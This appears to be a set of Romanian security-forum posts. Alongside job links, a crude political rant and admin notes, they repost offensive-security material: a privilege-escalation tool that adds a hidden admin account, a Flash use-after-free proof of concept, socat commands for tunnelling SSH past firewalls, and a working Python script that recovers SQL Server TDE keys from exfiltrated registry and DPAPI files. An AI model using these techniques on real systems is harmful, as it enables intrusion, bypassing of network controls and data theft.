Nytro

Job-urile disponibile la inceputul lunii aprilie: https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/search/4376842 Cateva job-uri selectate: Penetration Testing Consultant - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/principal-consultant-penetration-testing-75285 Network Engineer - Telecom - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/network-engineer-telecom-85891 Information Security Specialist - Rotating Shifts - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/information-security-specialist-rotating-shifts-80306 Desktop Support Analyst - Rotating Shifts - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/desktop-support-analyst-rotating-shifts-82324 Firewall Engineer - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/firewall-engineer-81902 Windows System Administrator - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/windows-system-administrator-82417 .NET Software Development Advisor - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/.net-software-development-advisor-83641 Java Software Developer - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/java-software-developer-82960 Senior Java Software Developer - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/senior-java-software-developer-82976 Senior Virtualization Administrator - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/senio-virtualization-administor-83424 Back-Up and Recovery Administrator - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/back-up-and-recovery-administrator-83426 Junior .NET Developer - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/junior-.net-developer-84945 IT Project Manager - Software - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/it-project-manager-software-85560 .NET Software Development Sr. Advisor - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/.net-software-development-sr.-advisor-86039 Local IT Support - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/deskside-technician-85137 Network Engineering Specialist - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/network-engineering-specialist-85077 Endpoint Security Advisor Encryption - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/endpoint-security-advisor-encryption-84579 Technical Support Supervisor - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/technical-support-supervisor-85867 IDS Support Engineer - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/ids-support-engineer-83942 Firewall Support Sr. Engineer - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/firewall-support-sr-engineer-83948 Vulnerability Specialist - https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/vulnerability-specialist-85444 Daca aveti vreo intrebare, astept un mesaj privat. Daca e cineva interesat de postul de Penetration Tester, va pot oferi mai multe detalii, sunt mai multe posturi disponibile.

Ce? Esti sigur ca nu ai baut prea mult?

Aveti idee ce face mai exact acest vaccin?

E facut in C# (asa pare), nici malware-ul in ziua de azi nu mai e ce era odata...

Ciolos e un prost. Cica "cartele romanesti PrePay au fost folosite pentru atentate". Sa ne suga pula, pana si SRI-ul a spus ca "sunt active pe terirorii de conflict bla bla" dar nu a zis nimic legat de asa ceva, o fi o Mama Omida Ciolos asta, iar publicul il crede... In plus, sunt mai multe tari care permit cumpararea de cartele fara buletin decat cele care nu permit in Europa. El zicea ca "majoritatea nu permit fara buletin", deci iar sa ne suga pula. Apoi, interzici in Romania, dar nu sunt interzise in alte 20 de tari. Ce se previne cu asta? Nimic. Serviciile pulii nu au destui bani si se folosesc de atentate ca sa manipuleze opinia publica, sa ii transforme in sclavi. Si inca ceva, se vand la negru arme si lansatoare de rachete, oare nu o sa se poata vinde niste cartele? ”Am sunat azi la parchetul din Bruxelles să întreb dacă există vreo informație în legătură cu numerele de telefon prepay românești folosite de teroriști. Așa a zis premierul Dacian Cioloș: — "Au fost folosite cartele prepay din România pentru pregătirea de atentate în UE." La parchet (am si o antenã firavã acolo), după ce s-au lămurit că nu e vorba de Armenia, ci de România (lumea pe-aici stã prost cu geografia), mi s-a confirmat (spre ușurarea mea) că nu, nici unul din teroriști nu avea telefon prepay de România. La fel și la Paris, unde am căutat să aflu și mai viclean. Nada, nimeni. Doar telefoane franceze și belgiene." Dan Alexe, corespondent Europa Liberă, Bruxelles.

TempRacer – Windows Privilege Escalation Tool March 29, 2016 TempRacer is a Windows Privilege Escalation Tool written in C# designed to automate the process of injecting user creation commands into batch files with administrator level privileges. The code itself is not using that many resources because it relies on callbacks from the OS. You can keep it running for the the whole day to try and catch the creation of an admin level batch file. It’s especially useful (and very successful) in environments where automated patching systems like BigFix are running. If you are able to trigger updates or new software installs you should give it a try. If successful it will inject the code to add the user “alex” with password “Hack123123” and add him to the local administrator group. It will also block the file for further changes, so the privilege escalation code stays inside. You can also find some Windows Privilege Escalation Tools in: PowerSploit – A PowerShell Post-Exploitation Framework And if you want to scan for privilege issues or misconfiguration, use this – windows-privesc-check – Windows Privilege Escalation Scanner You can download tempracer here: – TempRacer.exe – tempracer-1.zip (Source) Or read more here. Sursa: http://www.darknet.org.uk/2016/03/tempracer-windows-privilege-escalation-tool/

PwnWiki.io is a collection TTPs (tools, tactics, and procedures) for what to do after access has been gained. Live Online Copy: You can find a copy of the project online at: http://pwnwiki.io Offline Use: Clone the repository or pull the archive (download zip) of the repo Open index.html Most modern browsers don't allow the access of local files from a locally loaded HTML file. On Windows you can use Mongoose Tiny or HFS to host the files locally. On OSX and Linux python -m SimpleHTTPServer seems to work just fine. Referenced tools can be found here: https://github.com/mubix/post-exploitation (If they aren't built into the OS)

A Penetration Testing Framework , The Hacker's Repo our hope is in the last version we will have evry script that a hacker needs THIS TOOL IS ONLY FOR EDUCATIONAL PURPOSES ONLY Requirements Python 2 sudoer Link: https://github.com/x3omdax/PenBox

USB Thief, the new USB-based data stealing Trojan March 29, 2016 By Pierluigi Paganini USB Thief, the new USB-based data-stealing Trojan discovered by ESET that relies on USB devices in order to spread itself and infect also air-gapped systems Security researchers at ESET have discovered a new insidious data-stealer, dubbed USB Thief (Win32/PSW.Stealer.NAI), that relies on USB devices in order to spread itself. USB Thief is able to infect air-gapped or isolated systems does not leave any trace of activity on the infected systems. Malware authors have implemented special techniques mechanisms to protect USB Thief from being detected and analyzed. The authors also implemented an advanced multi-staged encryption process to protect the Trojan. “The USB Thief is, in many aspects different from the more common malware types that we’re used to seeing flooding the internet,” wrote Tomáš Gardoň, a malware analyst at ESET. “This one uses only USB devices for propagation, and it does not leave any evidence on the compromised computer. Its creators also employ special mechanisms to protect the malware from being reproduced or copied, which makes it even harder to detect and analyze. The USB Thief Trojan malware can be stored either as a Dynamically Linked Library (DLL) used by the portable applications or as a portable application’s plugin source. Mobile devices are usually used to store portable version of common applications like Firefox, TrueCrypt, and Notepad++. When victims launch the portable application the USB Thief runs in the background. “Unfortunately, this is not the case with the USB Thief as it uses an uncommon way to trick a user – it benefits from the fact that USB devices often store portable versions of some common applications like Firefox portable, Notepad++ portable, TrueCrypt portable and so on.” continues the post. The malware completely resides on the USB device, it doesn’t leave any trace of its presence. According to the experts at the ESET any tool that could be used to breach an air-gapped network must be taken into account. “Well, taking into account that organizations isolate some of their systems for a good reason,” said Peter Stancik, the security evangelist at ESET. “Any tool capable of attacking these so called air-gapped systems must be regarded as dangerous.” “People should understand the risks associated with USB storage devices obtained from sources that may not be trustworthy.” How can organizations prevent attacks based on USB Thief from succeeding? Do not use USB storage devices from sources that may not be trustworthy. Disable USB ports wherever possible. Define strict policies to enforce care in the use of USB devices. Train the staff on cyber threats. Pierluigi Paganini Sursa: http://securityaffairs.co/wordpress/45741/malware/usb-thief-trojan.html

Life After the Isolated Heap Posted by Natalie Silvanovich, Mourner of Lost Exploits Over the past few months, Adobe has introduced a number of changes to the Flash Player heap with the goal of reducing the exploitability of certain types of vulnerabilities in Flash, especially use-after-frees. I wrote an exploit involving two bugs discovered after the Isolated Heap was implemented to explore how it impacts their exploitability. The Isolated Heap The Flash heap, MMgc, is a garbage collected heap that also supports unmanaged fixed allocations. In the past, there have been many exploits in the wild that used certain properties of the heap to aid exploitation. In particular, many exploits used the allocation properties of Vectors to gain read/write access to the entire Flash memory space via heap memory corruption bugs. Exploits that use other object types, such as ByteArray and BitmapData have also been seen in the wild. MMgc was originally implemented as a type and size bucketed allocator. When memory is requested, the allocator that is called depends on the type of memory that is needed. This is related to the garbage collection properties of the memory. If it is not garbage collected, the Fixed allocator is used, otherwise the Garbage-Collected (GC) allocator is used. Within the GC allocator, there are about eight subtypes of memory that can be allocated, related to whether the memory contains pointers and whether those pointers have custom finalizers or GC routines that need to be called. Within each type, the request is sorted by size, and the memory is allocated on a heap page for that size. Large requests are allocated on their own page. The Isolated Heap introduces partitioning to the heap, essentially a third factor which determines where memory is allocated. There is separate memory for each partition, which is then split into subsections for different types and sizes. The goal of partitioning is to allocate objects that are likely to contain memory corruption bugs in a different area of memory than objects that are likely to be useful in exploiting memory corruption bugs, and generally add more entropy to the heap. There are currently three partitions on the heap. The first partition is generally used for objects that contain pointers: script objects, their backing GC-memory and certain pointer arrays. The second partition is used for objects that contain non-pointer data, mostly arrays of primitive types. The third partition is used for a small number of objects that have a history of being used in exploits. These are typically variable-sized data buffer objects. Outside of the Isolated Heap, checksumming has also been implemented to detect and abort if certain sensitive objects are ever altered. Articol complet: http://googleprojectzero.blogspot.ro/2016/03/life-after-isolated-heap.html?spref=tw

Adobe Flash - Object.unwatch Use-After-Free Exploit Sources: https://bugs.chromium.org/p/project-zero/issues/detail?id=716 https://googleprojectzero.blogspot.ca/2016/03/life-after-isolated-heap.html The bug is an uninitialized variable in the fix to an ActionScript 2 use-after-free bug. Roughly 80 of these types of issues have been fixed by Adobe in the past year, and two uninitialized variable issues were introduced in the fixes. This issue is fairly easy to reproduce, a proof-of-concept for this issue in its entirety is: var o = {}; o.unwatch(); The bug occurs because the use-after-free check in the unwatch method attempts to convert its first parameter to a string by calling toString on it before continuing with the part of the method where toString could cause problems by freeing an object. However, Flash does not check that this parameter exists before calling toString on it. In pseudo-code, the rough behaviour of this method is: void* args = alloca( args_size ); for( int i = 0; i < args_size; i++){ // Init args } if ( ((int) args[0]) & 6 == 6 ) args[0] = call_toString( args[0] ); if ( args_size < 1) exit(); Exploit: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39631.zip Sursa: https://www.exploit-db.com/exploits/39631/

O sa pun noul index dupa ce repara @Gecko problemele. Am pus 2 plugin-uri: 1. O sa primiti avertisment daca ultimul post intr-un topic este mai vechi de 60 de zile (dar tot veti putea posta) 2. RSS feed pe anumite forumuri: https://rstforums.com/forum/rssalltopics.xml Va rog sa testati, sper sa fie ok acel RSS.

Daca nu e un MS08-067 - autorul sa ne suga pula.

Lucrez, are o problema, @Gecko ce ai facut?

Am facut update la ultima version de IPBoard. Ce e nou: https://invisionpower.com/release-notes/ O sa ma ocup si de alte probleme cand o sa am timp.

Pics or didn't happen.

Asteptam dovezi si argumente.

E clasica asta cu "sloboz.pdf"

How to Recognize and Prevent Social Engineering Attacks A few weeks ago, two malicious social engineers impersonating the IRS called one of my close family friends. They yelled at her, threatened her, and told her she owed thousands of dollars in back taxes (not true). They knew her name, her address, and family members’ names. They told her they were outside her house. She was terrified. The attackers unsuccessfully tried to use fear to elicit an irrational decision (like transferring money to a random bank account). She was experiencing a vishing attack, one of the four primary methods of social engineering and one of the topics discussed in our recent webinar: Don’t Be Another Statistic: How To Recognize and Prevent Social Engineering Attacks. These types of attacks are directed towards companies every day, and they’re coming from all angles in many different forms. Hackers are capitalizing on fear, excitement, and other emotions to swindle organizations out of millions of dollars. Last week, we hosted an hour-long webinar featuring four social engineering experts, including Chris Hadnagy, founder and CEO at Social-Engineer, Inc. and author of several books, including Social Engineering: The Art of Human Hacking. Chris developed the world’s first social engineering penetration testing framework and has briefed more than 30 general officers and government officials at the Pentagon about social engineering and its effect on the United States. Sursa: http://blog.bettercloud.com/how-to-recognize-and-prevent-social-engineering-attacks/

Linux Kernel 4.5 Now Unofficially Available for Slackware 14.2 and Derivative Linux 4.5 kernel available for Zenwalk, Slax, and SlackEX Mar 17, 2016 23:05 GMT · By Marius Nestor Softpedia has been informed today, March 17, 2016, by GNU/Linux developer Arne Exton about the immediate availability of a custom compiled Linux 4.5 kernel for Slackware Linux Current (14.2) and all of its derivatives. According to Mr. Exton, he managed to compile the recently released Linux kernel 4.5, which was officially unveiled by Linus Torvalds on March 13, 2016, exactly the same way as Slackware’s latest kernel huge. The kernel is 64-bit only, and it can be used on the Slackware 14.2 Linux operating system, as well as any other Slackware-based distribution, including but not limited to Zenwalk, Slax, and Mr. Exton's SlaxEX. "I have compiled a very useful (as I think) 64 bit kernel for Slackware Current (14.2) and/or all Slackware derivatives," Arne Exton reveals for Softpedia. "The kernel is compiled exactly the same way as Slackware’s latest kernel huge." How to install Linux kernel 4.5 in Slackware 14.2 Again, the Linux 4.5 kernel distributed by Arne Exton is compatible with any Slackware-based operating system (see above for some example), but you should keep in mind that it only works on the 64-bit versions of these GNU/Linux distributions. The installation is pretty straightforward. All you have to do is download the linux-kernel-4.5-x86_64-exton.txz archive (check the MD5 checksum here), save it to your Home directory, extract its contents, and use the command below to install it. But before anything else, Arne Exton informs those who attempt to install his custom compiled kernel, which promises to offer better hardware support, that the installation will overwrite the existing kernel package, thus the /boot/vmlinuz file. Therefore, it is recommended that you make a backup of the vmlinuz file first in case you want to roll back the changes. After installation, you might also need to modify your GRUB bootloader configuration if you've made modifications to it. Lastly, users with Nvidia graphics cards should know that they need to take a look in the /etc/modprobe.d directory before restarting the computer, and remove the “blacklisting” of the Nouveau open source graphics driver in both the blacklist.conf and nvidia-installer-disable-nouveau.conf files. installpkg linux-kernel-4.5-x86_64-exton.txz Sursa: http://news.softpedia.com/news/linux-kernel-4-5-now-unofficially-available-for-slackware-14-2-and-derivatives-501870.shtml

From: Fyodor <fyodor () nmap org> Date: Thu, 17 Mar 2016 12:25:02 -0700 Hi Folks! Before I tell you about today's new Nmap release, I wanted to share some Summer of Code news: Google posted a fantastic story by one of our Summer of Code alumni about how the program helped take him from rural China to a full-ride scholarship at the University of Virginia graduate school! His mentor David and I had the chance to meet him in San Francisco: http://google-opensource.blogspot.com/2016/02/coming-to-america-how-google-summer-of.html Way to go, Weilin! Also, applications are now open for GSoC 2016. But only until next Friday. We've also added several new project ideas. So if you know any college/grad students (or are one!) interested in earning $5,500 writing open source Nmap code this summer, please point them here: https://nmap.org/soc/ And now for the main news: I'm pleased to announce the release of Nmap 7.10 with many great improvements! It's got 12 new NSE scripts, hundreds of new OS/version fingerprints, and dozens if smaller improvements and bug fixes. And that's not even counting the changes in Nmap 7.01, which we released in December but I never got around to announcing because I suck at marketing. Nmap 7.10 source code and binary packages for Linux, Windows, and Mac are available for free download from the usual spot: https://nmap.org/download.html If you find any bugs in this release, please let us know on the Nmap Dev list or bug tracker as described at https://nmap.org/book/man-bugs.html. Here is the full list of material changes in 7.10 and 7.01: o [NSE] Added 12 NSE scripts from 7 authors, bringing the total up to 527! They are all listed at https://nmap.org/nsedoc/, and the summaries are below (authors are listed in brackets): + [GH#322] http-apache-server-status parses the server status page of Apache's mod_status. [Eric Gershman] + http-vuln-cve2013-6786 detects a XSS and URL redirection vulnerability in Allegro RomPager web server. Also added a fingerprint for detecting CVE-2014-4019 to http-fingerprints.lua. [Vlatko Kosturjak] + [GH#226] http-vuln-cve2014-3704 detects and exploits the "Drupalgeddon" pre-auth SQL Injection vulnerability in Drupal. [Mariusz Ziulek] + imap-ntlm-info extracts hostname and sometimes OS version from NTLM-auth-enabled IMAP services. [Justin Cacak] + ipv6-multicast-mld-list discovers IPv6 multicast listeners with MLD probes. The discovery is the same as targets-ipv6-multicast-mld, but the subscribed addresses are decoded and listed. [Alexandru Geana, Daniel Miller] + ms-sql-ntlm-info extracts OS version and sometimes hostname from MS SQL Server instances via the NTLM challenge message. [Justin Cacak] + nntp-ntlm-info extracts hostname and sometimes OS version from NTLM-auth-enabled NNTP services. [Justin Cacak] + pop3-ntlm-info extracts hostname and sometimes OS version from NTLM-auth-enabled POP3 services. [Justin Cacak] + rusers retrieves information about logged-on users from the rusersd RPC service. [Daniel Miller] + [GH#333] shodan-api queries the Shodan API (https://www.shodan.io) and retrieves open port and service info from their Internet-wide scan data. [Glenn Wilkinson] + smtp-ntlm-info extracts hostname and sometimes OS version from NTLM-auth-enabled SMTP and submission services. [Justin Cacak] + telnet-ntlm-info extracts hostname and sometimes OS version from NTLM-auth-enabled Telnet services. [Justin Cacak] o Integrated all of your IPv4 OS fingerprint submissions from October to January (536 of them). Added 104 fingerprints, bringing the new total to 5089. Additions include Linux 4.2, more Windows 10, IBM i 7, and more. Highlights: http://seclists.org/nmap-dev/2016/q1/270 [Daniel Miller] o Integrated all of your service/version detection fingerprints submitted from October to January (508 of them). The signature count went up 2.2% to 10532. We now detect 1108 protocols, from icy, finger, and rtsp to ipfs, basestation, and minecraft-pe. Highlights: http://seclists.org/nmap-dev/2016/q1/271 [Daniel Miller] o Integrated all 12 of your IPv6 OS fingerprint submissions from October to January. The classifier added 3 new groups, including new and expanded groups for OS X, bringing the new total to 96. Highlights: http://seclists.org/nmap-dev/2016/q1/273 [Daniel Miller] o [NSE] Upgrade to http-form-brute allowing correct handling of token-based CSRF protections and cookies. Also, a simple database of common login forms supports Django, Wordpress, MediaWiki, Joomla, and others. [Daniel Miller] o [Zenmap] [GH#247] Remember window geometry (position and size) from the previous time Zenmap was run. [isjing] o New service probe for CORBA GIOP (General Inter-ORB Protocol) detection should elicit a not-found exception from GIOP services that do not respond to non-GIOP probes. [Quentin Hardy] o [GH#284] Fix retrieval of route netmasks on FreeBSD. IPv6 routes were given /32 netmasks regardless of actual netmask configured, resulting in failed routing. Reported by Martin Gysi. [Daniel Miller] o [GH#272][GH#269] Give option parsing errors after the usage statement, or avoid printing the usage statement in some cases. The options summary has grown quite large, requiring users to scroll to the top to see the error message. [Abhishek Singh] o [GH#249][Nsock] Avoid a crash on Windows reported by users using Zenmap's Slow Comprehensive Scan profile. In the case of unknown OpenSSL errors, ERR_reason_error_string would return NULL, which could not be printed with the "%s" format string. Reported by Dan Baxter. [Gisle Vanem, Daniel Miller] o [GH#293][Zenmap] Fix a regression in our build that caused copy-and-paste to not work in Zenmap on Windows. o Changed Nmap's idea of reserved and private IP addresses to include 169.254/16 (RFC3927) and remove 6/8, 7/8, and 55/8 networks. This list, in libnetutil's isipprivate function, is used to filter -iR randomly generated targets. The newly-valid address ranges belong to the U.S. Department of Defense, so users wanting to avoid those ranges should use their own exclusion lists with --exclude or --exclude-file. [Bill Parker, Daniel Miller] o Allow the -4 option for Nmap to indicate IPv4 address family. This is the default, and using the option doesn't change anything, but does make it more explicit which address family you want to scan. Using -4 with -6 is an error. [Daniel Miller] o [GH#265] When provided a verbosity of 0 (-v0), Nmap will not output any text to the screen. This happens at the time of argument parsing, so the usual meaning of "verbosity 0" is preserved. [isjing] o [NSE][GH#314] Fix naming of SSL2_RC2_128_CBC_WITH_MD5 and SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 ciphers in sslv2 in order to match thedraft specification from Mozilla. [Bertrand Bonnefoy-Claudet] o [NSE][GH#320] Add STARTTLS support to sslv2 to enable SSLv2 detection against services that are not TLS encrypted by default but that support post connection upgrade. This will enable more comprehensive detection of SSLv2 and DROWN (CVE-2016-0800) attack oracles. [Tom Sellers] o [NSE][GH#301] Added default credential checks for RICOH Web Image Monitor and BeEF to http-default-accounts. [nnposter] o Properly display Next-hop MTU value from ICMP Type 3 Code 4 Fragmentation Required messages when tracing packets or in Nping output. Improper offset meant we were printing the total IP length. [Sławomir Demeszko] o [NSE] Added support for DHCP options "TFTP server name" and "Bootfile name" to dhcp.lua and enabled checking for options with a code above 61 by default. [Mike Rykowski] o [NSE] whois-ip: Don't request a remote IANA assignments data file when the local filesystem will not permit the file to cached in a local file. [jah] o [NSE] Updated http-php-version hash database to cover all versions from PHP 4.1.0 to PHP 5.4.45. Based on scans of a few thousand PHP web servers pulled from Shodan API (https://www.shodan.io/) [Daniel Miller] o Use the same ScanProgressMeter for FTP bounce scan (-b) as for the other scan types, allowing periodic status updates with --stats-every or keypress events. [Daniel Miller] o [GH#274] Use a shorter pcap_select timeout on OpenBSD, just as we do for OS X, old FreeBSD, and Solaris, which use BPF for packet capture and do not have properly select-able fds. Fix by OpenBSD port maintainer [David Carlier] o Print service info in grepable output for ports which are not listed in nmap-services when a service tunnel (SSL) is detected. Previously, the service info ("ssl|unknown") was not printed unless the service inside the tunnel was positively identified. http://seclists.org/nmap-dev/2015/q4/260 [Daniel Miller] o [NSE] [GH#242] Fix multiple false-positive sources in http-backup-agent. [Tom Sellers] Nmap 7.01 [2015-12-09] o Switch to using gtk-mac-bundler and jhbuild for building the OS X installer. This promises to reduce a lot of the problems we've had with local paths and dependencies using the py2app and macports build system. [Daniel Miller] o The Windows installer is now built with NSIS 2.47 which features LoadLibrary security hardening to prevent DLL hijacking and other unsafe use of temporary directories. Thanks to Stefan Kanthak for reporting the issue to NSIS and to us and the many other projects that use it. o Updated the OpenSSL shipped with our binary builds (Windows, OS X, and RPM) to 1.0.2e. o [Zenmap] [GH#235] Fix several failures to launch Zenmap on OS X. The new build process eliminates these errors: IOError: [Errno 2] No such file or directory: '/Applications/Zenmap.app/Contents/Resources/etc/pango/pangorc.in' LSOpenURLsWithRole() failed for the application /Applications/Zenmap.app with error -10810. o [NSE] [GH#254] Update the TLSSessionRequest probe in ssl-enum-ciphers to match the one in nmap-service-probes, which was fixed previously to correct a length calculation error. [Daniel Miller] o [NSE] [GH#251] Correct false positives and unexpected behavior in http-* scripts which used http.identify_404 to determine when a file was not found on the target. The function was following redirects, which could be an indication of a soft-404 response. [Tom Sellers] o [NSE] [GH#241] Fix a false-positive in hnap-info when the target responds with 200 OK to any request. [Tom Sellers] o [NSE] [GH#244] Fix an error response in xmlrpc-methods when run against a non-HTTP service. The expected behavior is no output. [Niklaus Schiess] o [NSE] Fix SSN validation function in http-grep, reported by Bruce Barnett. Enjoy the new release! -Fyodor Sursa: http://seclists.org/nmap-announce/2016/1

SSH Over SCTP (With Socat) Jul 27, 2015 This is a quick post, kind of a reposting of a thing I pastebinned about a year ago that has served me REALLY well in evading stupid paywalls in airports and the likes. Also in evading a ridiculous firewall at the Uni I sometimes attend. The prerequisites are that you have a Linux box (maybe a Mac will work, idk. Not an OSX user but I can test if theres demand for it), a remote server, and a bit of familiarity with the command line. For the remote server, any server with a public IP address will do so long as you ensure it supports theSCTP protocol. Look up SCTP support for your distribution, usually its the lksctp libraries that need to be installed. DigitalOcean Debian instances and Amazon EC2 Ubuntu instances seem to work fine out of the box. Your local box also needs SCTP support. Again, with Debian, Ubuntu, and Arch Linux, this never seems to be an issue. Finally, you will need SSH access to the remote box, preferably as a user with admin privs so you can set up socat on it and listen on privileged ports. So, here goes. On the serverside (set this up BEFORE you need it), you will need to install “socat”(should be available in your distros repos. If not, compile it from source or something!). Next, you will need to just run the following command in a screen session. socat SCTP-LISTEN:80,fork TCP:localhost:22 # assuming you want the SCTP socket to listen on port 80/SCTP and sshd is on 22/TCP This will spin up a socat listener on port 80/SCTP, and forward any traffic sent to it through to port 22/TCP on the listening host. Change these ports as you see fit - often I run sshd on a different port (443/TCP) to evade other firewalls and the likes. Now, on the client side, when you want to connect, you will also need socat working with SCTP support. Same deal as making it work on the serverside. To spin up your socat proxy on local to forward to the remote server, do the following. socat TCP-LISTEN:1337,fork SCTP:SERVER_IP:80 # replace SERVER_IP with IP of listening server, and 80 with whatever port the SCTP listener is on :) This will spin up a TCP listener on localhost:1337/TCP, which is being forwarded over SCTP to the TCP port at the other end of the tunnel (in my example, port 22). To connect to the sshd at the other end, you just need to ssh to localhost:1337, and to get yourself some SOCKS5 for web browsing through your tunnel, do dynamic port forwarding. The following example sums it up for you. ssh -lusername localhost -D 8080 -p 1337 # replace username and -p port value as needed... Now you have a working tunnel! You should be ssh’d into your box, and you have a listening SOCKS5 proxy on port 8080 for tunnelling web browsing, email, etc through Let me know via email or whatever how this works out for you, I am very interested to know where it works and where it doesn’t. Usually I rely on DNS/ICMP tunnelling or UDP over port 53 with OpenVPN, but sometimes you just have to blast through the fucker by speaking a language it doesn’t even seem to comprehend Sursa: http://0x27.me/2015/07/27/SSH-Over-SCTP.html

The Anatomy and (In)Security of Microsoft SQL Server Transparent Data Encryption (TDE), or How to Break TDE Contents Intro TDE Encryption Breaking TDE Encryption of Data at Rest in General Should I Install TDE? Making the Most of a Bad Situation (using TDE) Hardware Support If not TDE, then what? This investigation started as a discussion with one of my clients over whether they should install TDE. There was political pressure for encryption of data at rest, and TDE was the primary candidate, but there is an obvious flaw. There is a fundamental problem with any software that encrypts its own data: it also needs to decrypt the data if it wants to use it itself. For example, if SQL Server wants to write data to an encrypted database and then later return it to a user, it needs the decryption key available to itself to be able to do that. If the system also has to boot without manual intervention and the sensitive functionality can’t be embedded in separate protected hardware, then that key must be stored on the system somewhere so that the server has access to it when it starts up. However if the key is stored on the system it is accessible to anybody that has gained elevated privileges and if the entire system is backed up, the key is also stored on the backups, making all data easily readable. “Obviously” the solution is to encrypt the key before storing it on the system, and that is what Microsoft does with TDE. Unfortunately that doesn’t really solve anything because in order to decrypt the encrypted key, you need to store that key instead. All this achieves is deferring the storage of the key with a little smoke and mirrors. Clearly the solution is to encrypt the encrypting key as well… And that is what Microsoft does with TDE. And so it continues. It’s turtles all the way down. Eventually though you have to stop adding layers and store the bottommost key somewhere unencrypted, defeating all of the layers of encryption immediately – and the whole world comes tumbling down, turtles and all. This basic and unavoidable logical necessity escapes many people. Perhaps it seems so terrible that they refuse to believe that such a seemingly pointless and maybe even dishonest thing would be built and sold as a security mechanism by a major company. Despite basic logic, some people just won’t believe anything until they see it with their own eyes, and so here we are. TDE Encryption Before we jump into breaking TDE, let’s take a look at how all of the data is encrypted. The diagram below provides an overview of the various decryption steps that are required. If this isn’t the posterchild of security by obscurity, I don’t know what is. This is actually slightly simplified, since there are multiple paths to the same data in some cases, and there are some subtleties in some of the processes not indicated. The path shown is the one we are most interested in because it is one of the easiest to replicate. Starting at the bottom, the most fundamental secret is the LSA secret key, which the rest of the layers stand on top of. This is stored on disk in the registry with a minor obfuscation (“substitution cipher”), but it is well known and is unkeyed so it provides no security whatsoever. Given that LSA key and a few other bits of key material stored in other files, the whole mess falls apart. The blue bubbles indicate the underlying files that contain the various critical pieces of information: The registry backups or hive files SYSTEM, SECURITY and SOFTWARE from %WINDIR%/System32/Config The DPAPI master keys from %WINDIR%/System32/Microsoft/Protect/S-1-5-18 The master database and the target user database(s). The databases can be recovered either from a SQL backup file or from raw .mdf files. In the case of .mdf files, it is also useful to have the corresponding .ldf database log files, though it is not essential. Armed with these pieces of information, all of the encryption keys can be directly recovered with no brute force required. Breaking TDE From the perspective of SQL server, the one key that rules them all is the Service Master Key (SMK). It is unique to each server/cluster, and it secures all of the layers above it. It is stored in the master database, which itself is never encrypted in TDE. However it is stored as an encrypted value in a field in the master database, so it still needs to be decrypted. The general approach to breaking TDE is to copy the databases from the target server (or from backups) and put them on a new “recovery” SQL server that we control. By copying the Service Master Key as well, all of the encrypted databases will be automatically decrypted by SQL server on the recovery server. The data on the recovery server can then be viewed, exported, etc. So it’s not necessary to really understand exactly what SQL Server does with the various database encryption keys beyond the Service Master Key, because we will just use it against itself to decrypt everything for us. The simple python script below takes the files collected and extracts the Service Master Key. Most of the work involved is in recovering the DPAPI keys, which is handled for us thanks to the excellent work from the creddump and dpapick projects. #!/usr/bin/env python # -*- coding: utf-8 -*- from DPAPI.Core import blob # https://pypi.python.org/pypi/dpapick/0.3 from DPAPI.Core import masterkey from DPAPI.Core import registry from optparse import OptionParser from Registry import Registry # https://github.com/williballenthin/python-registry from bitstring import ConstBitStream import re import os import sys def search_with_blob(entropy, dpapi_system, mkp, tdeblob): """Try decrypting with each master key""" wblob = blob.DPAPIBlob(tdeblob) mks = mkp.getMasterKeys(wblob.mkguid) for mk in mks: if mk.decrypted: wblob.decrypt(mk.get_key(), entropy) if wblob.decrypted: print("Decrypted service master key: %s" % wblob.cleartext.encode('hex')) else: print("Decryption failed") def search_with_entropy(entropy, dpapi_system, mkp, masterdb): """Search for DPAPI blobs in master database""" masterdb = ConstBitStream(filename = options.masterdb) for found in masterdb.findall('0x01000000D08C9DDF0115D1118C7A00C04FC297EB', bytealigned = True): blobsegment = masterdb[found:found+512*8] # Extraneous bytes ignored search_with_blob(entropy, dpapi_system, mkp, blobsegment.tobytes()) parser = OptionParser() parser.add_option("--masterkey", metavar='DIRECTORY', dest='masterkeydir') parser.add_option("--system", metavar='HIVE', dest='system') parser.add_option("--security", metavar='HIVE', dest='security') parser.add_option("--software", metavar='HIVE', dest='software') parser.add_option("--masterdb", metavar='FILE', dest='masterdb') (options, args) = parser.parse_args() reg = registry.Regedit() secrets = reg.get_lsa_secrets(options.security, options.system) dpapi_system = secrets.get('DPAPI_SYSTEM')['CurrVal'] mkp = masterkey.MasterKeyPool() mkp.loadDirectory(options.masterkeydir) mkp.addSystemCredential(dpapi_system) mkp.try_credential_hash(None, None) with open(options.software, 'rb') as f: reg = Registry.Registry(f) regInstances = reg.open('Microsoft\\Microsoft SQL Server\\Instance Names\\SQL') for v in regInstances.values(): print("Checking SQL instance %s" % v.value()) regInst = reg.open('Microsoft\\Microsoft SQL Server\\%s\\Security' % v.value()) entropy = regInst['Entropy'].value() search_with_entropy(entropy, dpapi_system, mkp, options.masterdb) Conveniently, the script is cross platform so it doesn’t need to be run on the Windows machine. That means no software installation is required on the target server, just some file exfiltration (or backups can be used). Once the DPAPI keys have been recovered, this script searches the master database for encrypted Service Master Keys. They are encrypted in a special DPAPI blob structure. The 